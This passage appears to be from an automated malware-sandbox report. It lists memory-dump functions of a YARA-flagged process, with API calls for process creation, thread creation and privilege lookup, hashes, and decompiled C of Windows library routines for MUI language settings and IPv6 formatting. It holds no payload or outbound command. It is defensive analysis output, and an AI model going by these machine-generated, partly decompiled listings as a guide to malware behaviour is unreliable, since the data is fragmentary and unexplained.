                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 117e98a4e37819197d72653e81a0359815b405dad333ed2bc3a335427f0668ee
                                      • Instruction ID: dfc1b78062b8f68086019292ecd9de6f94707042da2383880e24d998790c43fb
                                      • Opcode Fuzzy Hash: 117e98a4e37819197d72653e81a0359815b405dad333ed2bc3a335427f0668ee
                                      • Instruction Fuzzy Hash: 6C011EB5E0020DABDF10EAE4DC42FDDB7B89B55708F004595E90997642F631EB149B92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000AA6ED, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000AA744
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: 06858311f6440f041b58a09ebc3de278bc746520fab489ad4a5fc817f763bf5e
                                      • Instruction ID: 6d951b5f4c979c9f3234d69eb76305433643f9107aa50d565203aec9f4a797fa
                                      • Opcode Fuzzy Hash: 06858311f6440f041b58a09ebc3de278bc746520fab489ad4a5fc817f763bf5e
                                      • Instruction Fuzzy Hash: 8E01AFB2204108AFCB58DF89DC80EEB37A9AF8C754F158258BA0DD7255D630EC51CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000AA6F0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000AA744
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction ID: 700b7eb715e2ba4f21a51367b0e088b4d2ae1d0eb8b8db4f8cdec3b3ac9aed10
                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction Fuzzy Hash: 6E01AFB2210108AFCB58DF89DC80EEB77ADAF8C754F158258BA0D97251C630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000A91C0, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0009F050,?,?,00000000), ref: 000A91FC
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: f12d56d8ec8a2bb26070781c71241223565a01734460e95afd95452107832b6b
                                      • Instruction ID: 32a2cb0c1b2b1780e3ebe99512e8ca51f54f072f2eb46a2b985bf01ae086b643
                                      • Opcode Fuzzy Hash: f12d56d8ec8a2bb26070781c71241223565a01734460e95afd95452107832b6b
                                      • Instruction Fuzzy Hash: 5FE06D373802043AE22065D9AC02FE7B39C9B82B21F140026FA0DEB2C2D595F80142A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000A91B3, Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0009F050,?,?,00000000), ref: 000A91FC
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: 0172dfa19f74ce7a628134897db47104daaa4d8c6f85f4602b2b9d174cd27a92
                                      • Instruction ID: 4d0610bc319638655fbe46dc42a527256573bb42aefa1dc48acb40ca7dbd17ea
                                      • Opcode Fuzzy Hash: 0172dfa19f74ce7a628134897db47104daaa4d8c6f85f4602b2b9d174cd27a92
                                      • Instruction Fuzzy Hash: F7F0E5362A02003AE23166989C03FE377999F92B11F580019FA48BB3C2D5A5F94143A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000AA7D1, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0009F1D2,0009F1D2,?,00000000,?,?), ref: 000AA810
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 71fdbf0e167b1f374111f4436362fb19b60290f1df1f27626b5b28b93e954d9d
                                      • Instruction ID: 4c594acbdfd53f7e002d0e10bda2295a3998777d9a0f3859eb41aaab26337b2e
                                      • Opcode Fuzzy Hash: 71fdbf0e167b1f374111f4436362fb19b60290f1df1f27626b5b28b93e954d9d
                                      • Instruction Fuzzy Hash: ECF0A0B13002146FCB14DF88CC84EEB7B6AEF89350F148095F9089B282D630E910CBF4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 000AA7E0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0009F1D2,0009F1D2,?,00000000,?,?), ref: 000AA810
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction ID: 08d619a759526c68e9e2401cd5f567b517204a422b819a6d37bcae87e853081f
                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction Fuzzy Hash: B2E01AB12002086BDB14DF89CC85EE737ADAF89650F018164BA0857242CA30E8108BF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0009F6D0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003,?,00098D14,?), ref: 0009F6FB
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: b894b85e471362e4b4b601cdc184ec6d8a2c7ffee4f558636a8ef7911e72c19a
                                      • Instruction ID: c202ce0f26444d32fb00e57f3cdb4b8ed80ef1ccf5b597d54c4ccbdac3138c6f
                                      • Opcode Fuzzy Hash: b894b85e471362e4b4b601cdc184ec6d8a2c7ffee4f558636a8ef7911e72c19a
                                      • Instruction Fuzzy Hash: ADD05E656503092AEA10EAA49C03F6632C86B45B04F490064F948D62C3D990F4004165
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 025B8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 94%
                                      			E025B8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E025B8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0259E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E025B718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E025B8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E025B718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E025B8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E025B8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E025B8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E025B718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0259E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E02592340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E025AE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0259E2A8(_t322,  &_v68, _v16);
								if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E025AE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0259E2A8(_t322,  &_v68, _t236);
								if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E025B718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0259E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E02592340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E025AE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0259E2A8(_v12,  &_v68, _v16);
							if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E025AE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0259E2A8(_t322,  &_v68, _t269);
							if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E025B718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0259E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E02592340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E025AE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0259E2A8(_v12,  &_v68, _v16);
						if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E025AE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0259E2A8(_t322,  &_v68, _t296);
						if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                      0x025b8788
                                      0x025b8788
                                      0x025b8791
                                      0x025b8794
                                      0x025b8798
                                      0x025b879b
                                      0x025b879e
                                      0x025b87a1
                                      0x025b87a4
                                      0x025b87a7
                                      0x025b87aa
                                      0x025b87af
                                      0x02601ad3
                                      0x025b8b0a
                                      0x025b8b0d
                                      0x025b8b13
                                      0x025b8b19
                                      0x025b8b1f
                                      0x025b8b25
                                      0x025b8b2b
                                      0x025b8b31
                                      0x025b8b37
                                      0x025b8b3d
                                      0x025b8b46
                                      0x025b8b46
                                      0x025b87c6
                                      0x025b87d0
                                      0x02601ae0
                                      0x02601ae6
                                      0x02601af8
                                      0x02601af8
                                      0x02601afd
                                      0x02601afe
                                      0x02601b01
                                      0x02601b06
                                      0x02601b06
                                      0x025b87d6
                                      0x025b87f2
                                      0x025b87f7
                                      0x025b8807
                                      0x025b880a
                                      0x025b880f
                                      0x025b8810
                                      0x025b8813
                                      0x025b8818
                                      0x025b8818
                                      0x025b882c
                                      0x025b8831
                                      0x025b8838
                                      0x025b8908
                                      0x025b8920
                                      0x025b89f0
                                      0x025b8a08
                                      0x025b8af6
                                      0x025b8af6
                                      0x025b8af8
                                      0x025b8afb
                                      0x02601beb
                                      0x02601beb
                                      0x025b8b04
                                      0x02601bf8
                                      0x02601c0e
                                      0x02601c13
                                      0x02601c16
                                      0x02601c16
                                      0x02601bf8
                                      0x00000000
                                      0x025b8b04
                                      0x025b8a0e
                                      0x025b8a11
                                      0x025b8a14
                                      0x025b8a15
                                      0x025b8a18
                                      0x025b8a22
                                      0x025b8b59
                                      0x025b8a28
                                      0x025b8a3c
                                      0x025b8a3c
                                      0x025b8a42
                                      0x02601bb0
                                      0x02601b11
                                      0x02601b11
                                      0x00000000
                                      0x025b8a48
                                      0x025b8a51
                                      0x025b8a5b
                                      0x025b8a5e
                                      0x025b8a61
                                      0x025b8a69
                                      0x025b8a69
                                      0x025b8a6d
                                      0x00000000
                                      0x00000000
                                      0x025b8a74
                                      0x025b8a7c
                                      0x025b8a7d
                                      0x025b8a91
                                      0x025b8a93
                                      0x025b8a93
                                      0x025b8a98
                                      0x025b8a9b
                                      0x025b8aa1
                                      0x025b8aa1
                                      0x025b8aa4
                                      0x025b8aaa
                                      0x025b8ab1
                                      0x025b8ac5
                                      0x025b8ac7
                                      0x025b8ac7
                                      0x025b8ac5
                                      0x025b8ace
                                      0x02601bc9
                                      0x02601bce
                                      0x02601bd2
                                      0x02601bd2
                                      0x025b8ad8
                                      0x025b8aeb
                                      0x025b8aeb
                                      0x025b8af0
                                      0x025b8af4
                                      0x00000000
                                      0x025b8af4
                                      0x025b8a42
                                      0x025b8926
                                      0x025b8929
                                      0x025b892c
                                      0x025b892d
                                      0x025b8930
                                      0x025b8935
                                      0x025b893a
                                      0x025b8b51
                                      0x025b8940
                                      0x025b8954
                                      0x025b8954
                                      0x025b895a
                                      0x02601b63
                                      0x00000000
                                      0x025b8960
                                      0x025b8969
                                      0x025b8973
                                      0x025b8976
                                      0x025b8979
                                      0x025b897e
                                      0x025b8981
                                      0x025b8981
                                      0x025b8986
                                      0x00000000
                                      0x00000000
                                      0x02601b6e
                                      0x02601b74
                                      0x02601b7b
                                      0x02601b8f
                                      0x02601b91
                                      0x02601b91
                                      0x02601b99
                                      0x02601b9c
                                      0x02601ba2
                                      0x02601ba2
                                      0x025b898c
                                      0x025b8992
                                      0x025b8999
                                      0x025b89ad
                                      0x02601ba8
                                      0x02601ba8
                                      0x025b89ad
                                      0x025b89b6
                                      0x025b89c8
                                      0x025b89cd
                                      0x025b89d0
                                      0x025b89d0
                                      0x025b89d6
                                      0x025b89e8
                                      0x025b89e8
                                      0x025b89ed
                                      0x00000000
                                      0x025b89ed
                                      0x025b895a
                                      0x025b883e
                                      0x025b8841
                                      0x025b8844
                                      0x025b8845
                                      0x025b8848
                                      0x025b884d
                                      0x025b8852
                                      0x025b8b49
                                      0x025b8858
                                      0x025b886c
                                      0x025b886c
                                      0x025b8872
                                      0x02601b0e
                                      0x00000000
                                      0x025b8878
                                      0x025b8881
                                      0x025b888b
                                      0x025b888e
                                      0x025b8891
                                      0x025b8896
                                      0x025b8899
                                      0x025b8899
                                      0x025b889e
                                      0x00000000
                                      0x00000000
                                      0x02601b21
                                      0x02601b27
                                      0x02601b2e
                                      0x02601b42
                                      0x02601b44
                                      0x02601b44
                                      0x02601b4c
                                      0x02601b4f
                                      0x02601b55
                                      0x02601b55
                                      0x025b88a4
                                      0x025b88aa
                                      0x025b88b1
                                      0x025b88c5
                                      0x02601b5b
                                      0x02601b5b
                                      0x025b88c5
                                      0x025b88ce
                                      0x025b88e0
                                      0x025b88e5
                                      0x025b88e8
                                      0x025b88e8
                                      0x025b88ee
                                      0x025b8900
                                      0x025b8900
                                      0x025b8905
                                      0x00000000
                                      0x025b8905

                                      APIs
                                      Strings
                                      • Kernel-MUI-Number-Allowed, xrefs: 025B87E6
                                      • Kernel-MUI-Language-SKU, xrefs: 025B89FC
                                      • Kernel-MUI-Language-Allowed, xrefs: 025B8827
                                      • WindowsExcludedProcs, xrefs: 025B87C1
                                      • Kernel-MUI-Language-Disallowed, xrefs: 025B8914
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: _wcspbrk
                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                      • API String ID: 402402107-258546922
                                      • Opcode ID: c18dc0fc56fb19ac12e599fb4641d75fc57925eda29392d40a7628e04c8b00a6
                                      • Instruction ID: 48a7cfda28b5eb284bd86bec5e6f5d5a0913c5f28c6ee7c76abfc13b14a5ff61
                                      • Opcode Fuzzy Hash: c18dc0fc56fb19ac12e599fb4641d75fc57925eda29392d40a7628e04c8b00a6
                                      • Instruction Fuzzy Hash: 77F1F9B2D00209EFCF11DF98C985AEEBBB9FF48304F14546AE505A7250E7349A45DF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 025D13CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 38%
                                      			E025D13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E025C7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x2592926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E025C7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x2599cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E025C7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E025C7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E025C7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E025C7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                      0x025d13d5
                                      0x025d13d9
                                      0x025d13dc
                                      0x025d13de
                                      0x025d13e1
                                      0x025d13e8
                                      0x025d13ee
                                      0x025fe8fd
                                      0x00000000
                                      0x025fe921
                                      0x025fe921
                                      0x025fe928
                                      0x025fe982
                                      0x025fe98a
                                      0x00000000
                                      0x025fe99a
                                      0x025fe99e
                                      0x025fe9a3
                                      0x025fe9a8
                                      0x025fe9b9
                                      0x025fe978
                                      0x00000000
                                      0x025fe978
                                      0x025fe98a
                                      0x025fe92a
                                      0x025fe931
                                      0x025fe944
                                      0x025fe944
                                      0x025fe950
                                      0x025fe954
                                      0x025fe959
                                      0x025fe95e
                                      0x025fe963
                                      0x025fe970
                                      0x00000000
                                      0x025fe975
                                      0x025fe93b
                                      0x025fe980
                                      0x00000000
                                      0x025fe980
                                      0x025fe942
                                      0x025fe94b
                                      0x00000000
                                      0x025fe94b
                                      0x00000000
                                      0x025fe942
                                      0x025d13f4
                                      0x025d13f4
                                      0x025d13f9
                                      0x025d13fc
                                      0x025d13ff
                                      0x025d1406
                                      0x025fe9cc
                                      0x025fe9d2
                                      0x025fe9d2
                                      0x025fe9cc
                                      0x025d140c
                                      0x025d1411
                                      0x025d1431
                                      0x025d143a
                                      0x025d143c
                                      0x025d143f
                                      0x025d143f
                                      0x025d1442
                                      0x025d1447
                                      0x025d14a8
                                      0x025d14ac
                                      0x025fe9e2
                                      0x025fe9e7
                                      0x025fe9ec
                                      0x025fea05
                                      0x025fea05
                                      0x00000000
                                      0x025d1449
                                      0x00000000
                                      0x025d1449
                                      0x025d144c
                                      0x025d1459
                                      0x025d1462
                                      0x025d1469
                                      0x025d146a
                                      0x025d1470
                                      0x025d1473
                                      0x025d1476
                                      0x025d1476
                                      0x025d1490
                                      0x025d1495
                                      0x025d138e
                                      0x025d1390
                                      0x025d1397
                                      0x025d1398
                                      0x025d1399
                                      0x025d13a1
                                      0x025d13a4
                                      0x025d13a4
                                      0x025d1498
                                      0x025d149c
                                      0x025d149f
                                      0x025d14a2
                                      0x00000000
                                      0x00000000
                                      0x025d14a4
                                      0x00000000
                                      0x025d14a4
                                      0x025d1413
                                      0x025d1415
                                      0x025d1416
                                      0x025d1419
                                      0x025d141c
                                      0x025d1422
                                      0x025d13b7
                                      0x025d13bc
                                      0x025d13bf
                                      0x025d13bf
                                      0x025d13c2
                                      0x025d1424
                                      0x025d1424
                                      0x025d1424
                                      0x025d1427
                                      0x025d142b
                                      0x025d142c
                                      0x025d142c
                                      0x025d142c
                                      0x00000000
                                      0x025d141c
                                      0x025d1411

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp Download File
